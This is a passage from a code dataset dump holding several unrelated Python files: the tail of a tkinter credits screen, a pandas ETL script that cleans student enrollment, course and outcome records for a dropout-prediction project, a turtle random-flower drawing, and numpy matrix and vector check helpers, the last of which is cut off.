Destruir(self):\r\n\t\tself.Botones_Frame.destroy()\r\n\t\tself.Creditos_Frame.destroy()","repo_name":"Jaimewol12/Asalto_Blindado","sub_path":"Modulos/Creditos.py","file_name":"Creditos.py","file_ext":"py","file_size_in_byte":11177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72533466614","text":"#import matplotlib.pyplot 
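The `Creditos` screen above resizes every image with `Image.ANTIALIAS`, which Pillow deprecated in 9.1 and removed in 10.0. A version-tolerant sketch of the same open-scale-wrap pattern (the helper name and file path here are illustrative, not from the original):

```python
from PIL import Image, ImageTk

try:
    RESAMPLE = Image.Resampling.LANCZOS  # Pillow >= 9.1
except AttributeError:
    RESAMPLE = Image.ANTIALIAS  # older Pillow releases

def open_scaled(path: str, scale: float) -> "ImageTk.PhotoImage":
    """Open an image, scale both dimensions, and wrap it for tkinter."""
    img = Image.open(path)
    w, h = img.size
    img = img.resize((round(w * scale), round(h * scale)), RESAMPLE)
    return ImageTk.PhotoImage(img)  # requires an existing tk.Tk() root
```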
as plt\nimport numpy as np\nimport pandas as pd\nimport numpy as np\nimport logging\nimport sys\nimport math\nimport enum\nfrom enum import Enum\nimport time\n\n\n#helper functions below\n#===================================\ndef tf_translate(val):\n if val == 'Y':\n translated = True\n elif val == 'N':\n translated = False\n else:\n translated = val\n return translated\n\ndef assign_tf_val(col):\n col_vals = col.values\n new_ar = [tf_translate(val) for val in col_vals]\n return new_ar\n\ndef first_char(col):\n col_vals = col.values\n return np.array([val[0][0] for val in col_vals])\n\ndef convert_ac_year(df, return_df = False):\n '''converts to spring year'''\n col_vals = df['academic_year'].values\n new_ar = [int(val.split('-')[1]) for val in col_vals]\n if return_df:\n df['academic_year'] = new_ar\n return df\n else:\n return new_ar\n \ndef attendance_function(df):\n \n df = convert_ac_year(df, return_df = True)\n df.academic_year = df.academic_year.astype(int)\n \n df['d'] = df['academic_year']-1\n df.d = df.d.astype('str')\n df['period_start'] = '9/1/'+ df.d\n #df.drop(['d'], axis = 1, inplace= True)\n\n df['d'] = df['academic_year']\n df.d = df.d.astype('str')\n df['period_end'] = '6/30/'+ df.d\n df.drop(['d'], axis = 1, inplace= True)\n\n df['possible'] = 180\n\n return df\n\ndef clean_date(date):\n d = date.split('/')\n yr = d[-1]\n yr = '20'+yr\n \n return d[0]+'/'+d[1]+'/'+yr\n\ndef clean_grade(df_detail, st_id, ac_year):\n gl = df_detail.grade_level.values\n condition = (df_detail.student_id.values == st_id) & (df_detail.academic_year == ac_year)\n condition = condition.values\n grade = gl[condition]\n if len(grade)>0:\n grade = grade.astype(int)[0]\n else:\n grade = -1\n return grade\n\ndef clean_advance_retain(df_detail, st_id, ac_year):\n gl = df_detail.grade_level.values\n ac_year = ac_year.astype(int)\n \n \n condition1 = (df_detail.student_id.values == st_id) & (df_detail.academic_year == ac_year)\n condition2 = (df_detail.student_id.values == st_id) & (df_detail.academic_year == ac_year+1)\n \n\n condition1 = condition1.values\n condition2 = condition2.values\n\n grade_lower = gl[condition1]\n grade_higher = gl[condition2]\n \n if len(grade_lower)>=1 and len(grade_higher)>=1:\n grade_lower = grade_lower.astype(int)[0]\n grade_higher = grade_higher.astype(int)[0]\n if grade_lower+1 == grade_higher:\n status = 'advance'\n elif grade_lower == grade_higher:\n status = 'retain'\n else:\n status = 'other'\n else:\n status = 'other'\n \n return status\n\ndef clean_exit(df_detail, st_id, ac_year):\n #change code of second entry when there is an exit\n condition1 = (df_detail.student_id.values == st_id) & (df_detail.academic_year == ac_year) & (df_detail.code == 'other')\n \n if len(df_detail[condition1])>0:\n return df_detail[condition1].index.values[0]\n else:\n return -1\n \n\n#data into correct format for database\n#===================================\n\n## Student schema\ndef clean_detail_for_student_schema(data_files, cleaned):\n \"\"\"Modified from function for VPS for Arlington data.\"\"\"\n \"\"\"I want to build the student data here. 
I think all of the information I need for this table is in the detail csv\"\"\"\n\n column_names = {\n 'STUDENT_ID': 'student_id',\n 'FIRST_TIME_9TH_GRADER_COHORT': 'cohort', #this seems to be the year that they finished 9th grade\n 'BIRTH_DT': 'date_of_birth',\n 'GENDER_DESC': 'gender',\n 'ALT_RACE_DESC': 'race_ethnicity',\n 'SPED': 'sped_any'\n\n }\n\n logging.info(\"ETL: Starting Arlington data cleaning for student schema...\")\n\n \n for raw_base in data_files:\n\n df = pd.read_csv(raw_base, sep=',', header=0, dtype=object)\n logging.info(\"ETL: Cleaning base data file raw_base %s\"%raw_base)\n df.rename(columns=column_names, inplace=True)\n df = df.drop(['ETl_school_year', \n 'SCHOOL_ID', \n 'SCHOOL_LONG_NAME' ,\n 'GRADE_LEVEL_CD' , \n 'FRL' ,'LEP' ,\n 'Total_Absence' ,\n 'Total_Tardies', \n 'OSS_SUSP_NUMBERS', \n 'graduate_ind' ,\n 'diploma_completer_ind', \n 'First_Entry_Code', \n 'First_Entry_Code_Desc', 'Diploma_Type'], axis=1)\n \n #This gives multiple entries per student. It would be a good idea to \n #not replicate, so I'll first check to make sure it's consistent and then drop rows.\n df.fillna(-3, inplace = True)\n df.drop_duplicates(['student_id', \n 'cohort', \n 'race_ethnicity', \n 'gender', \n 'sped_any'\n ], inplace = True)\n\n df.student_id = df.student_id.astype(int)\n \n df.cohort = df.cohort.astype(int) + 3 # convert to graduating cohort\n \n \n stID_counts = df['student_id'].value_counts()\n duplicate_stIDs = stID_counts[stID_counts>1].index.values\n \n sped = assign_tf_val(df.sped_any)\n df.sped_any = sped\n\n \n for j in range(len(duplicate_stIDs)):\n duplicate_stID = duplicate_stIDs[j]\n \n vv = df[df['student_id']==duplicate_stID]['sped_any'].values \n if vv[0] or vv[1]:\n df.loc[df.student_id == duplicate_stIDs[j], 'sped_any'] = True\n \n df.drop_duplicates(['student_id', \n 'cohort', \n 'race_ethnicity', \n 'gender', \n 'sped_any'\n ], inplace = True)\n \n race = first_char(df.race_ethnicity)\n df.race_ethnicity = race\n df.race_ethnicity = df.race_ethnicity.astype(Enum)\n df.loc[df.race_ethnicity == 'O', 'race_ethnicity'] = 'X'\n gen = first_char(df.gender)\n df.gender = gen\n df.gender = df.gender.astype(Enum)\n\n df.to_csv(cleaned, header=True, index=False, date_format='%Y%m%d')\n \n#Enrollment scehma\ndef clean_detail_for_enrollment_schema(data_files, cleaned):\n column_names = {\n 'STUDENT_ID': 'student_id',\n 'FIRST_TIME_9TH_GRADER_COHORT': 'cohort', #this seems to be the year that they finished 9th grade\n 'GENDER_DESC': 'gender',\n 'ALT_RACE_DESC': 'race_ethnicity',\n 'SPED': 'special_ed',\n 'ETl_school_year': 'academic_year',\n 'GRADE_LEVEL_CD' : 'grade_level',\n 'LEP': 'ell', #limited english proficiency -> English language learner\n \n\n }\n\n logging.info(\"ETL: Starting Arlington cleaning for enrollment schema\")\n \n base_dfs = []\n for raw_base in data_files:\n\n df = pd.read_csv(raw_base, sep=',', header=0, dtype=object)\n logging.info(\"ETL: Cleaning base data file raw_base %s\"%raw_base)\n df.rename(columns=column_names, inplace=True)\n\n #TT, 77, and GD seem to indicate that someone has gone on after 12th grade without graduating\n #I'm going to enter all as 77 since it's an int\n df.grade_level[df.grade_level == 'TT'] = '77'\n df.grade_level[df.grade_level == 'GD'] = '77'\n \n df = df.drop(['SCHOOL_ID', \n 'SCHOOL_LONG_NAME' ,\n 'FRL' , #I'm not sure what this is\n 'Total_Absence' ,\n 'Total_Tardies', \n 'OSS_SUSP_NUMBERS', \n 'graduate_ind' ,\n 'diploma_completer_ind', \n 'First_Entry_Code', \n 'First_Entry_Code_Desc', \n 'Diploma_Type', 
\n 'race_ethnicity',\n 'cohort',\n 'gender'\n \n ], axis=1)\n \n #academic year should be an int. We go with the spring year\n years = convert_ac_year(df)\n df['academic_year'] = years\n \n #convert data types for columns we have\n df.student_id = df.student_id.astype(int)\n df.grade_level= df.grade_level.astype(int)\n df.academic_year = df.academic_year.astype(int)\n ell = assign_tf_val(df.ell)\n df.ell = ell\n \n sped = assign_tf_val(df.special_ed)\n df.special_ed = sped\n \n \n df.d = df.academic_year -1\n df.d = df.d.astype('str')\n df['date'] = '9/1/'+ df.d\n \n pd.to_datetime(df.date, format='%m/%d/%Y', errors='coerce')\n \n df.to_csv(cleaned, header=True, index=False, date_format='%Y%m%d')\n\n#Course, course enrollment, and school schema \ndef clean_for_course_schema(course_data, detail_dat, cleaned):\n #I think I have to infer this from the marks data\n #I should get the student ID and academic year\n\n column_names = {\n 'COURSE_CD':'code',\n 'COURSE_LONG_DESC':'name',\n 'SCHOOL_SHT_NAME':'school_name',\n 'STUDENT_ID': 'student_id',\n 'FIRST_TIME_9TH_GRADER_COHORT': 'cohort', #this seems to be the year that they finished 9th grade\n 'BIRTH_DT': 'date_of_birth',\n 'GENDER_DESC': 'gender',\n 'ALT_RACE_DESC': 'race_ethnicity',\n 'SPED': 'sped_any',\n 'ETl_school_year':'academic_year',\n 'ETL_SCHOOL_YEAR':'academic_year',\n 'SCHOOL_ID':'school_id',\n 'SCHOOL_LONG_NAME': 'school_name',\n 'SCHOOL_SHT_NAME':'school_name',\n 'COURSE_CD':'code',\n 'COURSE_LONG_DESC' : 'desc',\n 'Mark': 'mark',\n\n #need school ID. will have to write something to look this up --> Can get from detail dat\n\n }\n\n\n #first create map for school name\n for raw_base in detail_dat:\n\n df_detail = pd.read_csv(raw_base, sep=',', header=0, dtype=object)\n \n \n df_detail.rename(columns=column_names, inplace=True)\n df_detail = df_detail.drop([\n #'GRADE_LEVEL_CD',\n 'gender',\n 'cohort',\n 'race_ethnicity',\n 'FRL',\n 'LEP',\n 'sped_any',\n 'Total_Absence',\n 'Total_Tardies',\n 'OSS_SUSP_NUMBERS',\n 'graduate_ind',\n 'diploma_completer_ind',\n 'First_Entry_Code',\n 'First_Entry_Code_Desc',\n 'Diploma_Type',\n \n ], axis=1)\n \n #I'm going to make the school table.\n #There isn't enough data to get the years for each school from the data. \n #extra research needed\n \n \n df_school = df_detail.drop_duplicates([\n 'school_name'\n ], inplace = False)\n df_school = df_school.drop(['student_id',\n 'academic_year',\n 'GRADE_LEVEL_CD'],\n axis = 1\n )\n \n column_names_school = {\n 'school_name':'name'\n }\n df_school.rename(columns=column_names_school, inplace=True)\n\n df_school_unknown = pd.DataFrame([[-1, 'unknown_1'], [-2, 'ND'], [-3,'APT']], columns =['school_id', 'name'])\n df_school = df_school.append(df_school_unknown)\n \n df_school.to_csv(cleaned[2], header=True, index=False, date_format='%Y%m%d')\n \n #this was mapped manually\n #we don't have course data for most of the schools. 
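As an aside on the `assign_tf_val` helper defined earlier in this file: pandas can perform the same Y/N-to-boolean translation without a Python loop. A small sketch (the column name is illustrative; unlike the original helper, unmapped values become NaN here rather than passing through):

```python
import pandas as pd

df = pd.DataFrame({"ell": ["Y", "N", "Y"]})
df["ell"] = df["ell"].map({"Y": True, "N": False})
print(df["ell"].tolist())  # [True, False, True]
```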
\n #I'm going to map the numbers in this table and then map the names to the names from the other table\n school_to_id = {'H-B Woodlawn':'39',\n 'CC':'70',\n 'Williamsburg':'45',\n 'Washington Lee':'44',\n 'Yorktown':'49',\n 'Wakefield':'43',\n 'Arlington Mill':'26',\n 'Jefferson':'23',\n 'Swanson':'40',\n 'Langston':'25',\n 'Kenmore':'24',\n 'Gunston':'15',\n 'TJHSST':'96',\n 'NaN':'-1',\n 'ND':'-2',\n 'APT':'-3'}\n \n for raw_base in course_data:\n\n df = pd.read_csv(raw_base, sep=',', header=0, dtype=object)\n df.rename(columns=column_names, inplace=True)\n df.student_id = df.student_id.astype(int)\n \n logging.info(\"ETL: Cleaning base data file raw_base %s\"%raw_base)\n logging.info(\"Cleaning data for course schema...\")\n df.rename(columns=column_names, inplace=True)\n\n \n column_names = {'desc':'name', 'code':'course_code'}\n\n df['school_id'] = df['school_name'].map(school_to_id)\n #no foreign key constraint on school_id so just leave it in there for now.\n df.school_id.fillna(-1, inplace = True)\n \n\n df.rename(columns=column_names, inplace=True)\n years = convert_ac_year(df)\n \n years = np.array(years)\n df['d'] = years\n df.d = df.d.astype(int)\n \n #there is no info about dates besides academic year, so i'll just assume all course data is available on the last day of\n #the academic year.\n df.d = years\n df['academic_year'] = df.d.astype(int)\n df.d = df.d.astype('str')\n df['date'] = '6/30/'+ df.d\n df.drop(['d'], axis = 1, inplace= True)\n df_course_enrollment = df.drop(['name', 'school_name'], axis = 1)\n\n df_course_enrollment.drop_duplicates(['student_id',\n 'academic_year',\n 'course_code',\n 'mark'], inplace = True)\n\n #Sometimes people will withdraw and re-enter the same year.\n #I will make the 'date' for the W the fall semester.\n withdrawn = df_course_enrollment[df_course_enrollment['mark']=='W']\n\n #below should be rewritten \n start_time = time.time()\n for jk in range(len(withdrawn)):\n vv = withdrawn.iloc[jk]\n st_id = vv.student_id\n c_id = vv.course_code\n yr = vv.academic_year\n b = (df_course_enrollment['student_id'].values == st_id) & (df_course_enrollment['course_code'].values == c_id)\n\n vals = df_course_enrollment[b]\n if len(vals)>1:\n vals2 = vals[vals['mark']!='W']\n vw = vals[vals['mark']=='W']\n if yr in vals.academic_year.values:\n indw = vw.index.values[0]\n ind = vals[vals['academic_year']==yr].index.values[0]\n new_year = df_course_enrollment.academic_year.loc[ind]-1\n df_course_enrollment.date.loc[indw] = '12/31/'+ new_year.astype('str')\n \n end_time = time.time()\n \n #it looks like some people take the same course more than once in a year without withdrawing.\n #for now I'm going to drop this info\n \n df_course_enrollment.drop_duplicates(['student_id',\n 'academic_year',\n 'course_code',\n 'date'], inplace = True)\n\n df_course_enrollment.to_csv(cleaned[1], header=True, index=False, date_format='%Y%m%d')\n \n #now I will reduce this course enrollment data into course data\n df_course_enrollment = df_course_enrollment.drop(['student_id', \n 'academic_year', \n 'mark' ,\n 'date'], axis=1)\n \n df_course_enrollment.drop_duplicates(['school_id',\n 'course_code'], inplace=True)\n #column_names = {'code':'course_code'}\n #df_course_enrollment.rename(columns=column_names, inplace=True)\n df_course_enrollment['code'] = df_course_enrollment['course_code']\n df_course_enrollment.drop(['course_code'],axis = 1, inplace=True)\n \n df_course_enrollment.to_csv(cleaned[0], header=True, index=False, date_format='%Y%m%d')\n \ndef 
clean_for_attendance(detail_dat, cleaned):\n #for possible I will just be using 180 for each academic year\n #need: student_id, school_id, period_start, and period_end\n column_names = {\n 'COURSE_CD':'code',\n 'COURSE_LONG_DESC':'name',\n 'SCHOOL_SHT_NAME':'school_name',\n 'STUDENT_ID': 'student_id',\n 'FIRST_TIME_9TH_GRADER_COHORT': 'cohort', #this seems to be the year that they finished 9th grade\n 'BIRTH_DT': 'date_of_birth',\n 'GENDER_DESC': 'gender',\n 'ALT_RACE_DESC': 'race_ethnicity',\n 'SPED': 'sped_any',\n 'ETl_school_year':'academic_year',\n 'ETL_SCHOOL_YEAR':'academic_year',\n 'SCHOOL_ID':'school_id',\n 'SCHOOL_LONG_NAME': 'school_name',\n 'SCHOOL_SHT_NAME':'school_name',\n 'COURSE_CD':'code',\n 'COURSE_LONG_DESC' : 'desc',\n 'Mark': 'mark',\n 'Total_Tardies':'tardy',\n 'Total_Absence':'absence_excused'\n\n #need school ID. will have to write something to look this up --> Can get from detail dat\n\n }\n\n \n\n #first create map for school name\n for raw_base in detail_dat:\n \n\n df = pd.read_csv(raw_base, sep=',', header=0, dtype=object)\n\n df.rename(columns=column_names, inplace=True)\n df = df.drop([\n 'GRADE_LEVEL_CD',\n 'gender',\n 'cohort',\n 'race_ethnicity',\n 'FRL',\n 'LEP',\n 'sped_any',\n 'graduate_ind',\n 'diploma_completer_ind',\n 'First_Entry_Code',\n 'First_Entry_Code_Desc',\n 'Diploma_Type',\n 'OSS_SUSP_NUMBERS',\n 'school_name'\n \n ], axis=1)\n \n \n df_attendance = attendance_function(df)\n df_attendance.to_csv(cleaned, header=True, index=False, date_format='%Y%m%d')\n \ndef simplified_outcome_detail_code(outcome_dat, detail_dat):\n #for possible I will just be using 180 for each academic year\n #need: student_id, school_id, period_start, and period_end\n column_names = {\n 'COURSE_CD':'code',\n 'COURSE_LONG_DESC':'name',\n 'SCHOOL_SHT_NAME':'school_name',\n 'STUDENT_ID': 'student_id',\n 'FIRST_TIME_9TH_GRADER_COHORT': 'cohort', #this seems to be the year that they finished 9th grade\n 'BIRTH_DT': 'date_of_birth',\n 'GENDER_DESC': 'gender',\n 'ALT_RACE_DESC': 'race_ethnicity',\n 'SPED': 'sped_any',\n 'ETl_school_year':'academic_year',\n 'ETL_SCHOOL_YEAR':'academic_year',\n 'SCHOOL_ID':'school_id',\n 'SCHOOL_LONG_NAME': 'school_name',\n 'SCHOOL_SHT_NAME':'school_name',\n 'COURSE_CD':'code',\n 'COURSE_LONG_DESC' : 'desc',\n 'Mark': 'mark',\n 'Total_Tardies':'tardy',\n 'Total_Absence':'absence_excused',\n 'GRADE_LEVEL_CD':'grade_level'\n\n #need school ID. will have to write something to look this up --> Can get from detail dat\n\n }\n\n df_detail = pd.read_csv(detail_dat, sep=',', header=0, dtype=object)\n df_outcome = pd.read_csv(outcome_dat, sep=',', header =0, dtype = object)\n\n \n df_outcome.rename(columns=column_names, inplace=True)\n df_detail.rename(columns = column_names, inplace=True)\n \n \n #we have more outcome data than we have student ID data. \n #After some investigation I find that some students must have more than one outcome\n \n df_outcome = convert_ac_year(df_outcome, return_df = True)\n df_detail = convert_ac_year(df_detail, return_df = True)\n \n df_outcome = df_outcome.drop(['Year_Type',\n 'school_name',\n #'grade_level', #this is not accurate in the outcome file. 
It is always listed as 12 even though it isn't\n 'race_ethnicity',\n 'gender',\n 'Entry_Date',\n 'ENTRY_REASON_CD',\n \n ],\n axis = 1)\n \n df_outcome.grade_level = -1\n df_detail = df_detail.drop(['school_name',\n 'race_ethnicity',\n 'gender',\n 'FRL',\n 'LEP',\n 'sped_any',\n 'absence_excused',\n 'tardy',\n 'cohort',\n 'OSS_SUSP_NUMBERS',\n 'First_Entry_Code_Desc',\n 'Diploma_Type',\n 'diploma_completer_ind',\n 'First_Entry_Code',\n \n ],\n axis = 1)\n \n\n df_detail['code'] = 'end_of_year'#'end_of_year'\n df_detail['code'][df_detail['graduate_ind']=='1'] = 'graduate'\n df_detail = df_detail.drop(['graduate_ind'], axis = 1)\n \n \n df_detail = df_detail.sort(['student_id', 'grade_level'])\n df_detail['at_default_school'] = True #I will set this to True for the detail df\n df_outcome = df_outcome.sort(['student_id'])\n df_outcome['at_default_school'] = True #Just set this to false for now and will check later\n df_code = df_outcome.copy()\n df_outcome = df_outcome.drop(['EXIT_CODE_LONG_DESCRIPTION'], axis=1)\n df_code = df_code.drop(['academic_year',\n \n 'student_id',\n 'school_id',\n 'Exit_Date',\n ], axis =1)\n \n df_code = df_code.drop_duplicates(['EXIT_REASON_CD'])\n\n\n return df_detail, df_outcome\n\ndef clean_for_outcome(outcome_dat, detail_dat, cleaned): \n APScode_to_standard = {'W503':'exit',\n 'W310':'exit',\n 'W970':'exit',\n 'W402':'exit',\n 'W313':'exit',\n 'W870':'exit',\n 'W321':'exit',\n 'W217':'exit',\n 'W306':'exit', \n 'W307':'exit',\n 'W305':'exit',\n 'W304':'exit',\n 'W312':'exit',\n 'W960':'exit',\n 'W4TJ':'exit',\n 'W880':'dropout',\n 'W201':'transfer_internal',\n 'W503':'exit',\n 'W016':'transfer_internal',\n 'W115':'transfer_internal',\n 'W99': 'end_of_year_outcome', \n 'W411':'other',\n 'W730':'graduate',\n 'W731':'graduate'}\n\n df_detail, df_outcome = simplified_outcome_detail_code(outcome_dat, detail_dat)\n \n #I'm going to drop anything with 'end_of_year_outcome' because I think it doesn't give us any information\n df_outcome = df_outcome[df_outcome.EXIT_REASON_CD != 'W99']\n df_outcome['code'] = df_outcome['EXIT_REASON_CD'].map(APScode_to_standard)\n df_outcome.drop(['EXIT_REASON_CD'], axis = 1, inplace = True)\n df_detail['d'] = df_detail.academic_year.astype(int)\n df_detail['Exit_Date'] = '6/30/'+df_detail.d.astype(str)\n df_detail.drop(['d'], axis = 1, inplace = True)\n df_detail.grade_level[df_detail.grade_level == 'TT'] = '77'\n df_detail.grade_level[df_detail.grade_level == 'GD'] = '77'\n \n dates = df_outcome['Exit_Date'].apply(clean_date)\n df_outcome['Exit_Date']=dates\n df_outcome['date'] = df_outcome.Exit_Date\n df_detail['date'] = df_detail.Exit_Date\n \n #df = pd.concat([df_detail, df_outcome])\n df = pd.concat([df_outcome, df_detail])\n \n #I think TT and GD are continuing education codes\n #I have put grade level from outcome table as -1\n \n df = df.sort(['student_id', 'date', 'grade_level']) \n df = df.drop_duplicates(['academic_year', 'student_id', 'code', 'school_id', 'grade_level'])\n \n neg1 = (df['grade_level']=='-1').values\n \n st_ids = df.student_id.values[neg1]\n ac_yrs = df.academic_year.values[neg1]\n new_grades = np.array([clean_grade(df_detail, st_ids[i], ac_yrs[i]) for i in range(len(st_ids))])\n \n df.grade_level[neg1] = new_grades\n df.grade_level = df.grade_level.astype(int)\n df.student_id = df.student_id.astype(int)\n df.academic_year = df.academic_year.astype(int)\n df_detail.student_id = df_detail.student_id.astype(int)\n df_detail.academic_year = df_detail.academic_year.astype(int)\n df_detail.grade_level = 
df_detail.grade_level.astype(int)\n    \n    df = df.drop_duplicates(['academic_year', 'student_id', 'code', 'school_id', 'grade_level'])\n    \n    g1 = (df['code']=='end_of_year').values\n    st_ids = df.student_id.values[g1]\n    ac_yrs = df.academic_year.values[g1]\n    new_codes = np.array([clean_advance_retain(df_detail, st_ids[i], ac_yrs[i]) for i in range(len(st_ids))])\n    df.code[g1] = new_codes\n\n    df = df[df['grade_level']!=-1]\n    \n    g1 = (df.code == 'dropout') | (df.code == 'exit') | (df.code == 'graduate') \n    st_ids = df[g1].student_id.values\n    ac_yrs = df[g1].academic_year.values\n    drop_inds = list(set([clean_exit(df, st_ids[i], ac_yrs[i]) for i in range(len(st_ids))]))\n    drop_inds = np.array(drop_inds)\n    drop_inds = drop_inds[drop_inds>0]\n    \n    df.code.iloc[drop_inds]='drop'\n    df = df[df.code != 'drop']\n    \n    #let's make sure all the columns are the right datatype\n    df.student_id = df.student_id.astype(int)\n    df.school_id = df.school_id.astype(int)\n    df.academic_year = df.academic_year.astype(int)\n    df.grade_level = df.grade_level.astype(int)\n    pd.to_datetime(df.date, format='%m/%d/%Y', errors='coerce')\n    df.code= df.code.astype(Enum)\n\n    df['date'] = df['Exit_Date']\n    df.drop(['Exit_Date'], axis = 1, inplace=True)\n    \n    \n    df.to_csv(cleaned, header=True, index=False, date_format='%Y%m%d')\n","repo_name":"lisamnash/predicting_dropouts","sub_path":"etl/sys1/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":27006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29369183675","text":"# https://seongjuhong.com/2019-06-25am-how-to-draw-random-flower-with-python-turtle/\n\nfrom random import randrange\nfrom turtle import Turtle, Screen\n\nMAX_ANGLE = 30\nMAX_DISTANCE = 250\n\ndef jaggedLine(turtle, pieceLength):\n    randomColor(turtle)\n\n    while turtle.distance(0,0) < MAX_DISTANCE:\n        angle = randrange(-MAX_ANGLE, MAX_ANGLE + 1)\n        turtle.right(angle)\n        turtle.forward(pieceLength)\n\ndef jumpToCenter(turtle):\n    turtle.penup()\n    turtle.home()\n    turtle.pendown()\n\ndef randomColor(turtle):\n    r = randrange(255)\n    g = randrange(255)\n    b = randrange(255)\n\n    turtle.pencolor(r, g, b)\n\ndef main():\n    s = Screen()\n    s.colormode(255)\n    t = Turtle()\n    t.speed('fastest') # because I have no patience\n\n    for angle in range(0, 360, 2):\n        jumpToCenter(t)\n        t.setheading(angle)\n        jaggedLine(t, 30)\n\n    t.hideturtle()\n\n    s.mainloop()\n\nif __name__ == \"__main__\":\n    main()","repo_name":"mervy/playing-with-python","sub_path":"playingWithTurtle/randomFlower.py","file_name":"randomFlower.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21221477644","text":"import numpy as np\n\nfrom implicit_config import TOLERANCE\nfrom implicit_config import VERBOSE\n\n\ndef make_inverse(m):\n    assert not issubclass(m.dtype.type, np.integer)\n    assert m.shape == (4, 4), \"Matrix must be 4x4\"\n    invm = np.linalg.inv(m)\n    assert np.allclose(np.dot(invm, m), np.eye(4), atol=TOLERANCE), \"Matrix inversion failed: Matrix is singular or bad conditioned\"\n    assert np.allclose(np.dot(m, invm), np.eye(4), atol=TOLERANCE), \"Matrix inversion failed: Matrix is singular or bad conditioned\"\n    error = np.sum(np.abs(np.dot(invm, m) - np.eye(4)))\n    if VERBOSE:\n        print(\"Error of the inverse matrix: %2.20f\" % error)\n    v0001 = np.reshape(np.array((0, 0, 0, 1)), (4))\n    assert np.allclose(invm[3, :], v0001, atol=TOLERANCE), \"Last row of the inverse matrix should be 0,0,0,1 \"\n    
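`make_inverse` above wraps `np.linalg.inv` in round-trip `allclose` checks before trusting the result. The same guard in a compact standalone form (the tolerance value is illustrative):

```python
import numpy as np

def checked_inverse(m: np.ndarray, atol: float = 1e-9) -> np.ndarray:
    inv = np.linalg.inv(m)
    # Both products must round-trip to the identity, or the matrix was
    # too badly conditioned for the inverse to be trusted.
    assert np.allclose(inv @ m, np.eye(m.shape[0]), atol=atol)
    assert np.allclose(m @ inv, np.eye(m.shape[0]), atol=atol)
    return inv

print(checked_inverse(np.eye(4) * 2.0)[0, 0])  # 0.5
```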
return invm\n\n\ndef check_matrix4(m):\n    assert not issubclass(m.dtype.type, np.integer)\n    assert m.shape == (4, 4), \"Matrix must be 4x4\"\n    assert np.allclose(m[3, :], np.array((0, 0, 0, 1)), atol=0.00000000001), \"Last row of any Matrix4 must be 0,0,0,1\"\n    assert not np.any( np.isnan(m.ravel()) )\n    assert not np.any( np.isinf(m.ravel()) )\n\ndef check_matrix4_vectorized(m):\n    assert not issubclass(m.dtype.type, np.integer)\n    assert m.shape[1:] == (4, 4), \"Matrix must be Nx4x4\"\n    for i in range(m.shape[0]):\n        assert np.allclose(m[i, 3, :], np.array((0, 0, 0, 1)), atol=0.00000000001), \"Last row of any Matrix4 must be 0,0,0,1\"\n    assert not np.any( np.isnan(m.ravel()) )\n    assert not np.any( np.isinf(m.ravel()) )\n\n\ndef check_matrix3_vectorized(h):\n    #print(h.ndim)\n    #print(h.ndim == 3)\n    #print(h.shape)\n    #print(h.shape[1:])\n    #print(h.shape[1:] == (3,3) )\n    assert h.ndim == 3, \"not 3d\"\n    #assert(h.shape[1] == 3)\n    #assert(h.shape[2] == 3)\n    assert h.shape[1:] == (3, 3), \"not :x3x3\"\n    assert not np.any( np.isnan(h.ravel()) )\n    assert not np.any( np.isinf(h.ravel()) )\n\n\ndef check_vector4(p):\n    assert not issubclass(p.dtype.type, np.integer)\n    assert p.shape == (4,), \"Vector must be a numpy array of (4) elements\"\n    assert p[3] == 1.0, \"4th element of every Vector must be 1.0\"\n    assert not np.any( np.isnan(p.ravel()) )\n    assert not np.any( np.isinf(p.ravel()) )\n\n\ndef check_vector4_vectorized(pa):\n    #assert not issubclass(np.dtype('int8').type, np.integer)\n    assert not issubclass(pa.dtype.type, np.integer)\n    assert pa.ndim == 2\n    assert pa.shape[1:] == (4,), \"Vector must be a numpy array of (Nx4) elements\"\n    e = np.sum(np.abs(pa[:, 3]-1))\n    if e > 0.0:\n        print(\"ERROR:\", e)\n    assert np.allclose(pa[:, 3], 1, 0.00000000000001), \"4th element of every Vector must be 1.0\"\n    assert not np.any( np.isnan(pa.ravel()) )\n    assert not np.any( np.isinf(pa.ravel()) )\n\ndef check_scalar_vectorized(va, N=None):\n    #assert va.ndim == 2 #don't force 2 dim. 
can accept .shape==(100,)\n    assert not issubclass(va.dtype.type, np.integer)\n    n = va.shape[0]\n    if va.ndim == 2:\n        assert va.shape[1] == 1\n        assert va.shape == (n, 1), \"values must be a numpy array of (N,) or (Nx1) elements\"\n    if not N is None:\n        assert va.shape[0] == N\n    assert not np.any( np.isnan(va.ravel()) )\n    assert not np.any( np.isinf(va.ravel()) )\n\ndef make_vector4_numpy(v):\n    assert issubclass(type(v), np.ndarray)\n    assert v.size == 3 or v.size == 4\n\n    assert not np.any( np.isnan(v.ravel()) )\n    assert not np.any( np.isinf(v.ravel()) )\n\n    v = v.ravel()\n    return np.array((float(v[0]), float(v[1]), float(v[2]), 1.0))\n\n\ndef make_vector4(x, y, z):\n    xyz = np.array([x,y,z])\n    assert not np.any( np.isnan(xyz) )\n    assert not np.any( np.isinf(xyz) )\n\n    if issubclass(type(x), np.ndarray):\n        return np.array((float(x[0]), float(y[0]), float(z[0]), 1.0))\n\n    return np.array((float(x), float(y), float(z), 1.0))\n\ndef make_vector4_vectorized(x, y, z):\n    return make_vector4(x, y, z).reshape((1,4))\n\n\ndef almost_equal4(a, b, TOLERANCE):\n    assert not np.any( np.isnan(a.ravel()) )\n    assert not np.any( np.isinf(b.ravel()) )\n    assert not issubclass(a.dtype.type, np.integer)\n    check_vector4(a)\n    check_vector4(b)\n    return np.sum(np.abs(a - b)) < TOLERANCE\n\n\ndef almost_equal1(a, b, TOLERANCE):\n    \"\"\" Scalar version \"\"\"\n    assert not issubclass(a.dtype.type, np.integer)\n    np.isscalar(a)\n    np.isscalar(b)\n    return np.sum(np.abs(a - b)) < TOLERANCE\n\n\ndef almost_equal4_vectorized(a, b, TOLERANCE):\n    assert a.ndim == 2\n    assert b.ndim == 2\n    check_vector4_vectorized(a)\n    check_vector4_vectorized(b)\n    return np.sum(np.abs(a[:, :] - b[:, :])) < TOLERANCE\n\n\ndef check_matrix3(m):\n    #print(m.shape)\n    assert m.shape == (3, 3)\n\n\ndef make_random_vector(norm, POW, type=\"rand\"):\n    if type == \"rand\":\n        r = np.random.rand(3)*2 - 1\n    elif type == 